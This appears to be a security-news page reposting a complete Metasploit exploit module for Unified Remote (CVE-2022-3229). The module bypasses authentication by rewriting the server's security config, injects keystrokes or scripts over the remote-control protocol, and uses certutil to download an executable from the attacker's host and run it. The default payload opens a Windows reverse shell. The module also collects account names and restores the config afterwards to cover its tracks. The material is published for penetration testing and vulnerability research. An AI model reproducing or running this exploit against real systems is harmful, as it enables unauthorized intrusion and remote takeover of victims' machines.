Security
Headlines
HeadlinesLatestCVEs

Headline

Unified Remote Authentication Bypass / Code Execution

This Metasploit module utilizes the Unified Remote remote control protocol to type out and deploy a payload. The remote control protocol can be configured to have no passwords, a group password, or individual user accounts. If the web page is accessible, the access control is set to no password for exploitation, then reverted. If the web page is not accessible, exploitation will be tried blindly. This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.

Packet Storm
#web#android#windows#js#git#java#rce#auth#wifi
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Exploit::Remote::Tcp  # attempted cmdstger, however there was so much sleep involved for the screen to clear the buffer  # that it was going to take hours. The buffer would also overrun itself and the exploit would fail  # if not enough sleep time was used. it was a nightmare, not for this exploit.  # include Msf::Exploit::CmdStager  include Exploit::EXE # generate_payload_exe  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Unified Remote Auth Bypass to RCE',        'Description' => %q{          This module utilizes the Unified Remote remote control protocol to type out and          deploy a payload.  The remote control protocol can be configured to have no passwords,          a group password, or individual user accounts.  If the web page is accessible, the          access control is set to no password for exploitation, then reverted.          If the web page is not accessible, exploitation will be tried blindly.          This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'H4RK3NZ0' # edb        ],        'References' => [          [ 'EDB', '49587' ],          [ 'URL', 'https://www.unifiedremote.com/' ],          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],          [ 'CVE', '2022-3229' ]        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          ['pull', {}],        ],        'Payload' => {          'BadChars' => "\x0a\x00"        },        'DefaultOptions' => {          # since this may get typed out ON SCREEN we want as small a payload as possible          'PAYLOAD' => 'windows/shell/reverse_tcp'        },        'DisclosureDate' => '2021-02-25',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [CRASH_SERVICE_DOWN],          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port Unified Remote runs on', 9512]),        OptPort.new('WEBSERVER', [true, 'Port Unified Remote web server runs on', 9510]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),        OptBool.new('VISIBLE', [false, 'Make exploitation visible to the user', false]),      ]    )  end  def win_key    'LWIN' # 4c57494e  end  def ret_key    'RETURN' # 52455455524e  end  def space_key    'SPACE' # 5350414345  end  def path    return datastore['PATH'] if datastore['PATH'].end_with? '\\'    "#{datastore['PATH']}\\"  end  def initialize_packet    initialize_packet = "\x00\x00\x00\x85\x00\x01\x08"    initialize_packet << "Action\x00" # 416374696f6e 00    initialize_packet << "\x00\x05"    initialize_packet << "Password\x00" # 50617373776f7264 00    initialize_packet << '8e8133b3-a18b-43af-a7cd-e04f747827ce' # 38653831333362332d613138622d343361662d613763642d653034663734373832376365 seems to be a default    initialize_packet << "\x00\x05"    initialize_packet << "Platform\x00" # 506c6174666f726d 00    initialize_packet << "android\x00" # 616e64726f6964 00    initialize_packet << "\x08"    initialize_packet << "Request\x00" # 52657175657374 00    initialize_packet << "\x00\x05"    initialize_packet << "Source\x00" # 536f7572636500    # this line shows up in logs as who connected    initialize_packet << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00    initialize_packet << "\x03"    initialize_packet << "Version\x00" # 56657273696f6e 00    initialize_packet << "\x00\x00\x00\x0a\x00"  end  def empty_authentication    empty_authentication = "\x00\x00\x00\xc8\x00\x01\x08"    empty_authentication << "Action\x00" # 416374696f6e 00    empty_authentication << "\x01\x02"    empty_authentication << "Capabilities\x00" # 4361706162696c6974696573 00    empty_authentication << "\x04"    empty_authentication << "Actions\x00" # 416374696f6e73 00    empty_authentication << "\x01\x04"    empty_authentication << "Encryption2\x00" # 456e6372797074696f6e32 00    empty_authentication << "\x01\x04"    empty_authentication << "Fast\x00" # 46617374 00    empty_authentication << "\x00\x04"    empty_authentication << "Grid\x00" # 47726964 00    empty_authentication << "\x01\x04"    empty_authentication << "Loading\x00" # 4c6f6164696e6700    empty_authentication << "\x01\x04"    empty_authentication << "Sync\x00" # 53796e6300    empty_authentication << "\x01\x00\x05"    empty_authentication << "Password\x00" # 50617373776f7264 00    empty_authentication << 'd634c1dcfdeb8735608a4a104ded4076de766dd61443619809ad7f35858d4492' # 64363334633164636664656238373335363038613461313034646564343037366465373636646436313434333631393830396164376633353835386434343932 seems to be a default    empty_authentication << "\x00\x08"    empty_authentication << "Request\x00" # 52657175657374 00    empty_authentication << "\x01\x05"    empty_authentication << "Source\x00" # 536f7572636500    # this line shows up in logs as who connected    empty_authentication << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00    empty_authentication << "\x00"  end  #############################################  # These methods/packets are for visible mode  #############################################  def string_header_one(length)    # 2 null, then message length takes next 2 spots    string_header_one = "\x00\x00"    string_header_one << [length].pack('n').to_s  end  def string_header_two    string_header_two = "\x00\x01\x08"    string_header_two << "Action\x00" # 416374696f6e 00    string_header_two << "\x07\x05"    string_header_two << "ID\x00" # 4944 00    string_header_two << "Relmtech.Keyboard\x00" # 52656c6d746563682e4b6579626f617264 00    string_header_two << "\x02"    string_header_two << "Layout\x00" # 4c61796f7574 00    string_header_two << "\x06"    string_header_two << "Controls\x00" # 436f6e74726f6c73 00    string_header_two << "\x02\x00\x02"    string_header_two << "OnAction\x00" # 4f6e416374696f6e 00    string_header_two << "\x02"    string_header_two << "Extras\x00" # 457874726173 00    string_header_two << "\x06"    string_header_two << "Values\x00" # 56616c756573 00    string_header_two << "\x02\x00\x05"    string_header_two << "Value\x00" # 56616c7565 00  end  def string_footer    string_footer = "\x00\x00\x00\x00\x05"    string_footer << "Name\x00" # 4e616d65 00    string_footer << "toggle\x00" # 746f67676c65 00    string_footer << "\x00\x05"    string_footer << "Source\x00" # 536f75726365 00    # this line shows up in logs as who connected    string_footer << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00    string_footer << "\x00"  end  def send_key(key, press_return: false)    if key == ' '      key = space_key    end    contents = "#{string_header_two}#{key}#{string_header_three}#{key}#{string_footer}"    contents = "#{string_header_one(contents.length)}#{contents}"    sock.put(contents)    if press_return      contents = "#{string_header_two}#{ret_key}#{string_header_three}#{ret_key}#{string_footer}"      contents = "#{string_header_one(contents.length)}#{contents}"      sock.put(contents)    end  end  ##############################################  # These methods/packets are for invisible mode  ##############################################  def load_unified_command    # header: 00 00 00 5e    wait = "\x00\x01\x08"    wait << "Action\x00" # 416374696f6e 00    wait << "\x03\x05" # changed from the previous one from 07 to 03    wait << "ID\x00" # 4944 00    wait << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00    wait << "\x02"    wait << "Layout\x00" # 4c61796f7574 00    wait << "\x03"    wait << "Hash\x00" # 48617368 00    wait << "\x9e\xd0\x99:\x00" # 9ed0993a 00    wait << "\x08"    wait << "Request\x00" # 52657175657374 00    wait << "\x03\x05" # changed from the previous one from 07 to 03    wait << "Source\x00" # 536f7572636500    wait << "#{@client_name}\x00"    wait << "\x00"  end  def create_script    # header: 00 00 00 e2    new_onee = "\x00\x01\x08"    new_onee << "Action\x00" # 416374696f6e 00    new_onee << "\x07\x05"    new_onee << "ID\x00" # 4944 00    new_onee << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00    new_onee << "\x02"    new_onee << "Layout\x00" # 4c61796f7574 00    new_onee << "\x06"    new_onee << "Controls\x00" # 436f6e74726f6c73 00    new_onee << "\x02\x00\x02"    new_onee << "OnAction\x00" # 4f6e416374696f6e 00    new_onee << "\x02"    new_onee << "Extras\x00" # 457874726173 00    new_onee << "\x06"    new_onee << "Values\x00" # 56616c756573 00    new_onee << "\x02\x00\x05"    new_onee << "Key\x00" # 4b6579 00    new_onee << "Text\x00" # 54657874 00    new_onee << "\x05"    new_onee << "Value\x00" # 56616c7565 00    new_onee << "\x00\x00\x00\x00\x05"    new_onee << "Name\x00" # 4e616d65 00    new_onee << "update\x00" # 757064617465 00    new_onee << "\x00\x08"    new_onee << "Type\x00" # 54797065 00    new_onee << "\x08\x00\x00\x00\x08"    new_onee << "Request\x00" # 52657175657374 00    new_onee << "\x07\x02"    new_onee << "Run\x00" # 52756e 00    new_onee << "\x02"    new_onee << "Extras\x00" # 457874726173 00    new_onee << "\x06"    new_onee << "Values\x00" # 56616c756573 00    new_onee << "\x02\x00\x05"    new_onee << "Key\x00" # 4b6579 00    new_onee << "Text\x00" # 54657874 00    new_onee << "\x05"    new_onee << "Value\x00" # 56616c7565 00    new_onee << "\x00\x00\x00\x00\x05"    new_onee << "Name\x00" # 4e616d65 00    new_onee << "update\x00" # 757064617465 00    new_onee << "\x00\x05"    new_onee << "Source\x00" # 536f75726365 00    new_onee << "#{@client_name}\x00"    new_onee << "\x00"  end  def initialize_keyboard    # header 00 00 00 4b    new_twoo = "\x00\x01\x08"    new_twoo << "Action\x00" # 416374696f6e 00    new_twoo << "\x05\x05"    new_twoo << "ID\x00" # 4944 00    new_twoo << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00    new_twoo << "\x08"    new_twoo << "Request\x00" # 52657175657374 00    new_twoo << "\x05\x05"    new_twoo << "Source\x00" # 536f75726365 00    new_twoo << "#{@client_name}\x00"    new_twoo << "\x00"  end  def add_content(command)    # header is dymanic based on length of command    new_threee = "\x00\x01\x08"    new_threee << "Action\x00" # 416374696f6e 00    new_threee << "\x07\x05"    new_threee << "ID\x00" # 4944 00    new_threee << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00    new_threee << "\x02"    new_threee << "Layout\x00" # 4c61796f7574 00    new_threee << "\x06"    new_threee << "Controls\x00" # 436f6e74726f6c73 00    new_threee << "\x02\x00\x02"    new_threee << "OnAction\x00" # 4f6e416374696f6e 00    new_threee << "\x02"    new_threee << "Extras\x00" # 457874726173 00    new_threee << "\x06"    new_threee << "Values\x00" # 56616c756573 00    new_threee << "\x02\x00\x05"    new_threee << "Key\x00" # 4b6579 00    new_threee << "Text\x00" # 54657874 00    new_threee << "\x05"    new_threee << "Value\x00" # 56616c7565 00    new_threee << command    new_threee << "\x00\x00\x00\x00\x05"    new_threee << "Name\x00" # 4e616d65 00    new_threee << "update\x00" # 757064617465 00    new_threee << "\x00\x08"    new_threee << "Type\x00" # 54797065 00    new_threee << "\x08\x00\x00\x00\x08"    new_threee << "Request\x00" # 52657175657374 00    new_threee << "\x07\x02"    new_threee << "Run\x00" # 52756e 00    new_threee << "\x02"    new_threee << "Extras\x00" # 457874726173 00    new_threee << "\x06"    new_threee << "Values\x00" # 56616c756573 00    new_threee << "\x02\x00\x05"    new_threee << "Key\x00" # 4b6579 00    new_threee << "Text\x00" # 54657874 00    new_threee << "\x05"    new_threee << "Value\x00" # 56616c7565 00    new_threee << command    new_threee << "\x00\x00\x00\x00\x05"    new_threee << "Name\x00" # 4e616d65 00    new_threee << "update\x00" # 757064617465 00    new_threee << "\x00\x05"    new_threee << "Source\x00" # 536f75726365 00    new_threee << "#{@client_name}\x00"    new_threee << "\x00"  end  def execute_script    # header 00 00 00 96    new_fourr = "\x00\x01\x08"    new_fourr << "Action\x00" # 416374696f6e 00    new_fourr << "\x07\x05"    new_fourr << "ID\x00" # 4944 00    new_fourr << "Unified.Command\x00" # 556e69666965642e436f6d6d616e64 00    new_fourr << "\x02"    new_fourr << "Layout\x00" # 4c61796f7574 00    new_fourr << "\x06"    new_fourr << "Controls\x00" # 436f6e74726f6c73 00    new_fourr << "\x02\x00\x02"    new_fourr << "OnAction\x00" # 4f6e416374696f6e 00    new_fourr << "\x05"    new_fourr << "Name\x00" # 4e616d65 00    new_fourr << "execute\x00" # 65786563757465 00    new_fourr << "\x00\x08"    new_fourr << "Type\x00" # 54797065 00    new_fourr << "\x08\x00\x00\x00\x08"    new_fourr << "Request\x00" # 52657175657374 00    new_fourr << "\x07\x02"    new_fourr << "Run\x00" # 52756e 00    new_fourr << "\x05"    new_fourr << "Name\x00" # 4e616d65 00    new_fourr << "execute\x00" # 65786563757465 00    new_fourr << "\x00\x05"    new_fourr << "Source\x00" # 536f75726365 00    new_fourr << "#{@client_name}\x00"    new_fourr << "\x00"  end  def string_header_three    string_header_three = "\x00\x00\x00\x00\x05"    string_header_three << "Name\x00" # 4e616d65 00    string_header_three << "toggle\x00" # 746f67676c65 00    string_header_three << "\x00\x08"    string_header_three << "Type\x00" # 54797065 00    string_header_three << "\x08\x00\x00\x00\x08"    string_header_three << "Request\x00" # 52657175657374 00    string_header_three << "\x07\x02"    string_header_three << "Run\x00" # 52756e 00    string_header_three << "\x02"    string_header_three << "Extras\x00" # 457874726173 00    string_header_three << "\x06"    string_header_three << "Values\x00" # 56616c756573 00    string_header_three << "\x02\x00\x05"    string_header_three << "Value\x00" # 56616c7565 00  end  def on_request_uri(cli, _req)    p = generate_payload_exe    send_response(cli, p)    print_good("Payload request received, sending #{p.length} bytes of payload for staging")  end  def restart_server    http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })    # http client overrides sock, so we had to pick one... long live sock    request =  "GET /system/restart HTTP/1.1\r\n"    request <<  "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"    request <<  "\r\n"    http_sock.put(request)    disconnect    print_status('Sleeping 5 seconds for server to restart')    sleep(5)  end  def set_config(config)    print_status('Uploading new server config')    http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })    # http client overrides sock, so we had to pick one... long live sock    request =  "POST /system/config HTTP/1.1\r\n"    request <<  "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"    request <<  "Accept: application/json, text/javascript, */*; q=0.01\r\n"    request <<  "Content-Type: application/json\r\n"    request <<  "X-Requested-With: XMLHttpRequest\r\n"    request <<  "Content-Length: #{config.to_json.length}\r\n"    request <<  "\r\n"    request << config.to_json    http_sock.put(request)    begin      http_sock.get_once(-1)    rescue EOFError      return nil    end    disconnect    restart_server  end  def get_config    print_status('Retrieving server config')    http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })    # http client overrides sock, so we had to pick one... long live sock    request =  "GET /system/config HTTP/1.1\r\n"    request <<  "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"    request <<  "\r\n"    http_sock.put(request)    begin      res = http_sock.get_once(-1)    rescue EOFError      return nil    end    disconnect    body = res.split("\r\n\r\n")[1]    if body.include?('<h1>Forbidden (403)</h1>')      print_error('Web interface is disabled. Unable to attempt bypass, assuming no authentication.')      return nil    else      # transient error where the JSON doesn't fully receive maybe 1/15 tries in my testing      begin        return JSON.parse(body) # split between headers and body      rescue JSON::ParserError        return nil      end    end  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      last_attempted_at: DateTime.now,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def check    security_mode = get_config    if security_mode.nil?      return CheckCode::Unknown('Unable to get config from web server, unknown status of Unified Remote Controller')    end    CheckCode::Vulnerable("Unified Remote is vulnerable on port #{security_mode['interfaces']['tcp']['port']} with security mode '#{security_mode['security']['mode']}' (can be bypassed, if needed)")  end  def exploit    if datastore['CLIENTNAME'].blank?      @client_name = "android-#{Rex::Text.rand_text_alphanumeric(16)}"      print_status("Client name set to: #{@client_name}")    else      @client_name = datastore['CLIENTNAME']    end    # first grab the config from the HTTP server to determine if we need to disable auth    security_mode = get_config    reset_security_mode = nil    unless security_mode.nil?      if security_mode['security']['mode'] == 'none'        print_good('No security enabled')      else        print_status("#{security_mode['security']['mode']} mode enabled, password required, bypassing")        reset_security_mode = security_mode['security']['mode']        security_mode['security']['mode'] = 'none'        set_config(security_mode)      end      # now that we have the config, check if theres any users, no passwords (theyre GUIDs)      security_mode['security']['users'].each do |account|        print_good("Found account: #{account['username']}")        report_cred(          ip: rhost,          port: rport,          service_name: 'wifi mouse',          user: account['username'],          password: '',          proof: account        )      end    end    # start actually exploiting the rdp-ish server    connect    print_status('Sending handshake')    sock.put(initialize_packet)    sleep(datastore['SLEEP'])    print_status('Sending empty authentication')    sock.put(empty_authentication)    sleep(datastore['SLEEP'])    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'    register_file_for_cleanup("#{path}#{filename}")    # this method was in the original edb exploit, this is significantly faster    # and speed is of the essence since remote user input most likely breaks this module    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"    start_service('Path' => '/') # start webserver    if datastore['VISIBLE']      print_status('Opening Start Menu')      # original exploit sent it twice, so we follow that      send_key(win_key)      send_key(win_key)      sleep(datastore['SLEEP'])      print_status('Opening command prompt')      'cmd.exe'.each_char do |letter|        send_key(letter)      end      send_key(ret_key)      sleep(datastore['SLEEP'])      print_status('Typing out payload')      stager.each_char do |letter|        send_key(letter)      end      send_key(ret_key)      sleep(datastore['SLEEP'] * 2) # give time for it to save      print_status('Attempting to open payload')      "#{path}#{filename} && exit".each_char do |letter|        send_key(letter)      end      send_key(ret_key)    else      stager << " && #{path}#{filename} && exit"      print_status('Loading Unified.Command')      contents = load_unified_command      sock.put("#{string_header_one(contents.length)}#{contents}")      sleep(datastore['SLEEP'])      print_status('Updating Unified.Command')      contents = create_script      sock.put("#{string_header_one(contents.length)}#{contents}")      sleep(datastore['SLEEP'])      contents = initialize_keyboard      sock.put("#{string_header_one(contents.length)}#{contents}")      sleep(datastore['SLEEP'])      print_status('Sending payload')      contents = add_content(stager)      sock.put("#{string_header_one(contents.length)}#{contents}")      sleep(datastore['SLEEP'])      print_status('Executing script')      contents = execute_script      sock.put("#{string_header_one(contents.length)}#{contents}")      sleep(datastore['SLEEP'])      contents = create_script      sock.put("#{string_header_one(contents.length)}#{contents}")      sleep(datastore['SLEEP'])    end    handler    disconnect    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert    # lastly some cleanup    unless reset_security_mode.nil?      print_status('Reverting security mode')      security_mode['security']['mode'] = reset_security_mode      set_config(security_mode)    end  endend

Packet Storm: Latest News

Pyload Remote Code Execution